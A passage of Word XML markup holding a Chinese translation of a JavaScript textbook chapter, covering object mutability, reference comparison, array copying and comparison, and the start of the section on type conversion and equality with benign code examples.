      <w:r>
        <w:t>s.toUpperCase();//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"HELLO"</w:t>
      </w:r>
      <w:r>
        <w:t>，但并没有改变</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"hello":</w:t>
      </w:r>
      <w:r>
        <w:t>原始字符串的值并未改变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>原始值的比较是值的比较：只有在它们的值相等时它们才相等。这对数字、布尔值、</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>来说听起来有点儿难懂，并没有其他办法来比较它们。同样，对于字符串来说则并不明显：如果比较两个单独的字符串，当且仅当它们的长度相等且每个索引的字符都相等时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>才认为它们相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象和原始值不同，首先，它们是可变的</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>它们的值是可修改的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:1};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x=2;//</w:t>
      </w:r>
      <w:r>
        <w:t>通过修改对象属性值来更改对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.y=3;//</w:t>
      </w:r>
      <w:r>
        <w:t>再次更改这个对象，给它增加一个新属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3]//</w:t>
      </w:r>
      <w:r>
        <w:t>数组也是可修改的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[0]=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>更改数组的一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[3]=4;//</w:t>
      </w:r>
      <w:r>
        <w:t>给数组增加一个新元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象的比较并非值的比较：即使两个对象包含同样的属性及相同的值，它们也是不相等的。各个索引元素完全相等的两个数组也不相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var o={x:1},p={x:1};//</w:t>
      </w:r>
      <w:r>
        <w:t>具有相同属性的两个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o===p//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>两个单独的对象永不相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[],b=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>两个单独的空数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a===b//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>两个</w:t>
      </w:r>
      <w:r>
        <w:t>单独的数组永不相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们通常将对象称为引用类型（</w:t>
      </w:r>
      <w:r>
        <w:t>reference type</w:t>
      </w:r>
      <w:r>
        <w:t>），以此来和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的基本类型区分开来。依照术语的叫法，对象值都是引用（</w:t>
      </w:r>
      <w:r>
        <w:t>reference</w:t>
      </w:r>
      <w:r>
        <w:t>），对象的比较均是引用的比较：当且仅当它们引用同一个基对象时，它们才相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个引用空数组的变量</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var b=a;//</w:t>
      </w:r>
      <w:r>
        <w:t>变量</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>引用同一个数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b[0]=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>通过变量</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>来修改引用的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[0]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:t>变量</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>也会修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a===b//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:a</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>引用同一个数组，因此它们相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>就像你刚看到的</w:t>
      </w:r>
      <w:r>
        <w:t>如上代码，将对象（或数组）赋值给一个变量，仅仅是赋值的引用值：对象本身并没有复制一次。如果你想得到一个对象或数组的副本，则必须显式复制对象的每个属性或数组的每个元素。下面这个例子则是通过循环来完成数组复制（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.5.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=['a','b','c'];//</w:t>
      </w:r>
      <w:r>
        <w:t>待复制的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var b=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>复制到的目标空数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>a[]</w:t>
      </w:r>
      <w:r>
        <w:t>中的每个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b[i]=a[i];//</w:t>
      </w:r>
      <w:r>
        <w:t>将元素值复制到</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>中</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同样的，如果我们想比较两个单独的对象或者数组，则必须比较它们的属性或元素。下面这段代码定义了一个比较两个数组的函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function equalArrays(a,b){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a.length!=b.length)return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>两个长度不同的数组不相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;i++)//</w:t>
      </w:r>
      <w:r>
        <w:t>循环遍历所有元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a[i]!==b[i])return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果有任意元素不等，则数组不相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return true;//</w:t>
      </w:r>
      <w:r>
        <w:t>否则它们相等</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5" w:name="3_8_Lei_Xing_Zhuan_Huan_"/>
      <w:r>
        <w:t>3.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　类型转换</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的取值类型非常灵活，我们已经从布尔值看到了这一点：当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>期望使用一个布尔值的时候，你可以提供任意类型值，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将根据需要自行转换类型。一些值（真值）转换为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，其他值（假值）转换为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。这在其他类型中同样适用：如果</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>期望使用一个字符串，它把给定的值将转换为字符串。如果</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>期望使用一个数字，它把给定的值将转换为数字（如果转换结果无意义的话将返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>），一些例子如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>10+"objects"//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"10 ob</w:t>
      </w:r>
      <w:r>
        <w:t>jects".</w:t>
      </w:r>
      <w:r>
        <w:t>数字</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>转换成字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"7"*"4"//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>28:</w:t>
      </w:r>
      <w:r>
        <w:t>两个字符串均转换为数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var n=1-"x";//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>NaN:</w:t>
      </w:r>
      <w:r>
        <w:t>字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"x"</w:t>
      </w:r>
      <w:r>
        <w:t>无法转换为数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n+"objects"//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"NaN objects":NaN</w:t>
      </w:r>
      <w:r>
        <w:t>转换为字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"NaN"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:t>3-2</w:t>
      </w:r>
      <w:r>
        <w:t>简要说明了在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中如何进行类型转换。表</w:t>
      </w:r>
      <w:r>
        <w:t>3-2</w:t>
      </w:r>
      <w:r>
        <w:t>中的粗体部分突出显示了那些让你倍感意外的类型转换。空单元格表示不必要也没有执行转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4119113" cy="3459192"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="9" name="00009.jpeg" descr="000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00009.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4119113" cy="3459192"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:t>3-2</w:t>
      </w:r>
      <w:r>
        <w:t>中提到的原始值到原始值的转换相对简单，我们已经在</w:t>
      </w:r>
      <w:r>
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:t>节讨论过转换为布尔值的情况了。所有原始值转换</w:t>
      </w:r>
      <w:r>
        <w:t>为字符串的情形也已经明确定义。转换为数字的情形比较微妙。那些以数字表示的字符串可以直接转换为数字，也允许在开始和结尾处带有空格。但在开始和结尾处的任意非空格字符都不会被当成数字直接量的一部分，进而造成字符串转换为数字的结果为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。有一些数字转换看起来让人奇怪：</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>、空字符串</w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>原始值到对象的转换也非常简单，原始值通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，转换为它们各自的包装对象（见</w:t>
      </w:r>
      <w:r>
        <w:t>3.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>属于例外，当将它们</w:t>
      </w:r>
      <w:r>
        <w:t>用在期望是一个对象的地方都会造成一个类型错误（</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>）异常，而不会执行正常的转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象到原始值的转换多少有些复杂，</w:t>
      </w:r>
      <w:r>
        <w:t>3.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节将以此为专题专门讲述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="3_8_1_Zhuan_Huan_He_Xiang_Deng_Xing_"/>
      <w:r>
        <w:t>3.8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　转换和相等性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可以做灵活的类型转换，因此其</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>相等运算符也随相等的含义灵活多变。例如，如下这些比较结果均是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>null==undefined//</w:t>
      </w:r>
      <w:r>
        <w:t>这两值被认为相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"0"==0//</w:t>
      </w:r>
      <w:r>
        <w:t>在比较之前字符串转换成数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0==false//</w:t>
      </w:r>
      <w:r>
        <w:t>在比较之前布尔值转换成数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"0"==false//</w:t>
      </w:r>
      <w:r>
        <w:t>在比较之前字符串和布尔值都转换成数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>4.9.1</w:t>
      </w:r>
      <w:r>
        <w:t>节详细讲解了</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>等于运算符在判断两个值是否相等时做了哪些类型转换，并同样介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>恒等运算符在判断相等时并未做任何类型转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要特别注意的是，一个值转换为另一个值并不意味着两个值相等。比如，如果在期望使用布尔值的地方使用了</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，它将会转换为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，但这并不表明</w:t>
      </w:r>
      <w:r>
        <w:t>undefined==false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>运算符和语句期望使用多样化的数据类型，并可以相互转换。</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句将</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>fal</w:t>
      </w:r>
      <w:r>
        <w:t>se</w:t>
      </w:r>
      <w:r>
        <w:t>，但</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符从不试图将其操作数转换为布尔值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="3_8_2_Xian_Shi_Lei_Xing_Zhuan_Huan_"/>
      <w:r>
        <w:t>3.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　显式类型转换</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
